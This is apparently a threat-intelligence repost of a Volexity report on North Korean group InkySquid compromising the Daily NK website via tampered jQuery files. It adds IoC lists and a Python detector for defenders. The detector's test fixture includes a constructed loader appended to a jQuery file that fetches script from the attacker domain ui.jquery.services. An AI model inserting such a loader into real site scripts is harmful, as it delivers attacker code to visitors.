lazarusholic


North Korean APT InkySquid Infects Victims Using Browser Exploits

2021-08-17, Volexity
https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/
#Wateringhole #InkySquid #BLUELIGHT

Contents

North Korean APT InkySquid Infects Victims Using Browser Exploits
August 17, 2021
Volexity recently investigated a strategic web compromise (SWC) of the website of the Daily NK (www.dailynk[.]com), a South Korean online newspaper that focuses on issues relating to North Korea. Malicious code on the Daily NK website was observed from at least late March 2021 until early June 2021.
This post provides details on the different exploits used in the SWC, as well as the payload delivered, which Volexity calls BLUELIGHT. Volexity attributes the activity described in this post to a threat actor it tracks as InkySquid, which broadly corresponds to activity known publicly under the monikers ScarCruft and APT37.
SWC Activity
In April 2021, through its network security monitoring on a customer network, Volexity identified suspicious code being loaded via www.dailynk[.]com to malicious subdomains of jquery[.]services. Examples of URLs observed loading malicious code include the following:
hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1
hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
These URLs lead to legitimate files used …

IoC

558ce5e8c0b1b0a76b88db087f0c92f7a62716fe
5c430e2770b59cceba1f1587b34e686d586d2c8ba1908bb5d066a616466d2cc6
9b86888a83dd0dd1c3a0929f1ea53b82
http://jquery.services
http://www.dailynk.com
https://storage.jquery.services/log/history
https://ui.jquery.services/responsive-extend.min.js
https://ui.jquery.services/slider.min.css
https://ui.jquery.services/swipeout.min.css
https://ui.jquery.services/swipeout.min.js
https://www.dailynk.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
https://www.dailynk.com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1
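The SWC described above worked by serving the site's own, legitimate-looking jQuery files with code that pulled from attacker-controlled subdomains of jquery[.]services. Two checks follow directly from that: compare a served vendor script against the hash of the genuine release and look for references to hosts the page should never load from, and sweep proxy logs for the IoCs listed above. The Python below is an added example, not Volexity's tooling or code from the compromise; the "pristine" and "injected" scripts, the proxy log lines, the host allowlist and the host cdn.jquery.services are all constructed here to show the pattern (the only real indicators in it are the hashes and URLs copied from the IoC list).

```python
import hashlib
import re
from urllib.parse import urlparse

# Indicators copied from the IoC list on this page.
IOC_DOMAINS = {"jquery.services"}          # any host under this domain is suspect
IOC_URLS = {
    "https://storage.jquery.services/log/history",
    "https://ui.jquery.services/responsive-extend.min.js",
    "https://ui.jquery.services/slider.min.css",
    "https://ui.jquery.services/swipeout.min.css",
    "https://ui.jquery.services/swipeout.min.js",
    "https://www.dailynk.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2",
    "https://www.dailynk.com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1",
}
IOC_HASHES = {
    "558ce5e8c0b1b0a76b88db087f0c92f7a62716fe",                          # SHA-1
    "5c430e2770b59cceba1f1587b34e686d586d2c8ba1908bb5d066a616466d2cc6",  # SHA-256
    "9b86888a83dd0dd1c3a0929f1ea53b82",                                  # MD5
}
# Hosts a script served by the site may legitimately reference. Assumption: a
# site-specific allowlist; jquery.org is the licence link in the genuine jQuery header.
ALLOWED_HOSTS = {"www.dailynk.com", "jquery.org"}

URL_RE = re.compile(r"""https?://[^\s'"<>()]+""")


def in_ioc_domain(host):
    """True for the IoC domain itself and any subdomain of it."""
    return any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)


def digests(data):
    return {name: hashlib.new(name, data).hexdigest() for name in ("md5", "sha1", "sha256")}


def check_script(data, expected_sha256):
    """Findings for one served JavaScript file: drift from the vendor copy,
    a known-bad hash, and references to IoC or otherwise unexpected hosts."""
    findings = []
    d = digests(data)
    if d["sha256"] != expected_sha256:
        findings.append("hash_mismatch")
    if IOC_HASHES & set(d.values()):
        findings.append("known_ioc_hash")
    for url in URL_RE.findall(data.decode("utf-8", errors="replace")):
        host = urlparse(url).hostname or ""
        if in_ioc_domain(host):
            findings.append("ioc_domain:" + host)
        elif host not in ALLOWED_HOSTS:
            findings.append("unexpected_host:" + host)
    return findings


def scan_proxy_log(lines):
    """Return (line_no, reason) for each log line whose URL matches an IoC;
    an exact URL hit is reported in preference to a domain hit."""
    hits = []
    for n, line in enumerate(lines, start=1):
        m = URL_RE.search(line)
        if not m:
            continue
        url = m.group(0)
        host = urlparse(url).hostname or ""
        if url in IOC_URLS:
            hits.append((n, "ioc_url"))
        elif in_ioc_domain(host):
            hits.append((n, "ioc_domain:" + host))
    return hits


# Constructed stand-ins (not the real files): a jQuery-style file and the same file
# with a loader for an IoC host appended, the shape of a tampered vendor script.
PRISTINE_JS = (
    b"/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | https://jquery.org/license */\n"
    b"!function(e,t){\"use strict\";/* ... library body ... */}(window);\n"
)
INJECTED_JS = PRISTINE_JS + (
    b";(function(){var s=document.createElement('script');"
    b"s.src='https://ui.jquery.services/swipeout.min.js';document.head.appendChild(s);})();\n"
)
# In production take this from the vendor release (e.g. the matching WordPress tarball),
# never from the live server; here it is computed from the constructed pristine copy.
EXPECTED_SHA256 = hashlib.sha256(PRISTINE_JS).hexdigest()

# Constructed proxy log lines. cdn.jquery.services is a hypothetical host, added only
# to show that subdomain matching catches hosts absent from the published list.
SAMPLE_LOG = [
    "2021-04-02T10:15:01Z 10.0.0.5 GET https://www.dailynk.com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1 200",
    "2021-04-02T10:15:02Z 10.0.0.5 GET https://ui.jquery.services/swipeout.min.js 200",
    "2021-04-02T10:15:03Z 10.0.0.5 GET https://storage.jquery.services/log/history 200",
    "2021-04-02T10:16:00Z 10.0.0.7 GET https://code.jquery.com/jquery-3.5.1.min.js 200",
    "2021-04-02T10:17:00Z 10.0.0.9 GET https://cdn.jquery.services/x.js 200",
]

if __name__ == "__main__":
    print(check_script(PRISTINE_JS, EXPECTED_SHA256))  # []
    print(check_script(INJECTED_JS, EXPECTED_SHA256))  # ['hash_mismatch', 'ioc_domain:ui.jquery.services']
    print(scan_proxy_log(SAMPLE_LOG))
```

Two caveats when reading the results. A hit on the two www.dailynk[.]com URLs only means a client loaded the site's normal jQuery files, which were legitimate outside the late-March to early-June 2021 window the post gives, so those hits need the timeframe before they mean anything; the jquery[.]services hits are the actionable ones. And the hash check is only as good as its reference: the expected digest must come from the vendor release, because a copy taken from the compromised server would simply bless the injected file.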